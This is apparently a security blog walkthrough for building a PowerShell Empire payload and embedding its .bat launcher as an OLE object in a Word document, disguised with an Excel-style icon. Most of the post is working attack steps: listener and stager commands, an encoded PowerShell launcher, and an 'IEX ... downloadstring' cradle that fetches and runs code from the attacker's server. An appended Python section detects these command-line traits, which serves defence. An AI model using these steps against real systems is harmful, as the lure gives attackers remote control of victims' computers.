Empire Payload with an Object Linking & Embedding (OLE)

by @myexploit2600

Just a quick blog post, which was inspired by a chat I had with my mate @SecEventsPen.

For lab use only – Thanks to the crew who created and support Empire https://github.com/EmpireProject/Empire/blob/master/README.md

OLE objects are a great way to trigger a payload; the following details how to create one using Empire.

Empire

root@kali:~# cd Empire/
root@kali:~/Empire# ./empire

Create the listener in Empire.

For the OLE to work you need to host the payload on an HTTP server, so unless you have access to two servers you will need to change Empire's standard port from 80 to 8080. The config below takes this change into account.

listeners
uselistener http
set Name http
set BindIP 192.168.1.4
set Port 8080
set Host http://192.168.1.4:8080
execute
back

usestager windows/launcher_bat http
execute
back

You now need to close Empire and restart it. This is required because when you first started Empire the service would have defaulted to port 80; the restart forces your defined port change to 8080.

Open the payload created by Empire:

/tmp/launcher.bat

You need to delete two sections, the first at the start and the second at the end of the created payload. If you don’t, your payload will fail when used as an OLE.

The following details the sections you need to delete:

From the start of the payload

@echo off
start /b

And from the end

start /b "" cmd /c del "%~f0"&exit /b

This should leave you with the PS one liner starting with

powershell -noP -sta -w 1 -enc

Copy and paste the payload into a Notepad doc and save it (for lab use I tend to call my payloads powershell_attack.txt, a nod to Sir Kennedy of TrustedSec fame), then move the file over to the following directory:

/var/www/html

Now you can start apache2

root@kali:~/Empire# service apache2 start

If you see the following error, see the explanation directly below:

Job for apache2.service failed because the control process exited with error code.
See "systemctl status apache2.service" and "journalctl -xe" for details.

This is because Empire is still using port 80, so you just need to recheck that the Empire listener is set to port 8080. If it is not, repeat the listener setup as detailed above, then stop and restart Empire, then restart apache2.

So now you should have Empire listening on port 8080 and Apache running on port 80.

Open a Windows VM; if you don’t have one, grab one from here: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Once your Windows test host is running you need to create the .bat. Open Notepad and paste in the following, adding your own IP address where stated.

powershell.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstring('http://Add-Your-Own-IP-Address/powershell_attack.txt')"

Run the .bat file to check it works. It should connect to your apache2 server, download the payload and execute it; hopefully you will see a response similar to the one directly below.

[+] Initial agent GWMRH158 from 192.168.1.5 now active (Slack)

If you see nothing, use your Windows host to browse directly to http://Add-Your-Own-IP-Address/powershell_attack.txt and verify that you can see the payload in your browser. If you can’t, this will be your problem. If you can, copy all of the payload and paste it into CMD, and you should get a shell back. If not, there is a problem with the payload, so try repeating the creation stage.

So if the above is all working, it is now time to embed the .bat into an Office document.

Open Word, add some content.

Click on Object, Object again.

Pull down and select Package, and tick Display as icon.

Click on Change Icon, and locate your Office images in C:\Program Files\Microsoft Office\Office14; select any image that suits your requirement.

Rename the Package or just delete it, click OK.

Add the location of the .bat file which you created; this will embed the .bat, with your defined image, into the Word document.

Name it, click Finish.

Verify that all looks right, then to test, double click the OLE, which looks like an Excel document.

You should see a warning, and after clicking Run you will see a session in Empire.
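
The two command lines this walkthrough produces (the `-noP -sta -w 1 -enc` launcher and the `-exec bypass` download cradle) leave recognisable traits in process-creation logs. The following is an added example, not part of the original post or of Empire: a small Python triage function that names those traits and decodes the `-enc` argument. The sample lines and the helper names `encode_command`, `decode_enc` and `analyse` are constructed for illustration.

```python
import base64
import re

# Traits visible in the command lines on this page. PowerShell accepts
# abbreviated parameter names, so the patterns match prefixes.
TRAITS = {
    "encoded_command": re.compile(r"\s-e(?:nc\w*|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "execution_policy_bypass": re.compile(r"\s-e(?:x\w*|p)\s+bypass\b", re.I),
    "hidden_window": re.compile(r"\s-w\w*\s+(?:1|hidden)\b", re.I),
    "no_profile": re.compile(r"\s-nop\w*\b", re.I),
    "download_cradle": re.compile(r"\bIEX\b.*downloadstring\s*\(", re.I),
}

def encode_command(script):
    """Build a constructed -enc argument (Base64 over UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def decode_enc(b64):
    """Decode an -enc argument; return None if it is not Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:
        return None

def analyse(cmdline):
    """Return (sorted trait names, decoded -enc text or None) for one command line."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I):
        return [], None
    hits = {name for name, rx in TRAITS.items() if rx.search(cmdline)}
    decoded = None
    m = TRAITS["encoded_command"].search(cmdline)
    if m:
        decoded = decode_enc(m.group(1))
        if decoded and TRAITS["download_cradle"].search(decoded):
            hits.add("download_cradle")  # cradle hidden inside the encoded text
    return sorted(hits), decoded

# Constructed sample command lines, shaped like the ones shown on this page.
SAMPLES = [
    "powershell -noP -sta -w 1 -enc " + encode_command("Write-Output 'constructed lab payload'"),
    'powershell.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstring(\'http://Add-Your-Own-IP-Address/powershell_attack.txt\')"',
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        traits, decoded = analyse(line)
        print(traits, "| decoded:", decoded)
```

A single trait such as `no_profile` also appears in ordinary admin scripts, as the third sample shows, so treat the combination of traits, rather than any one of them, as the signal.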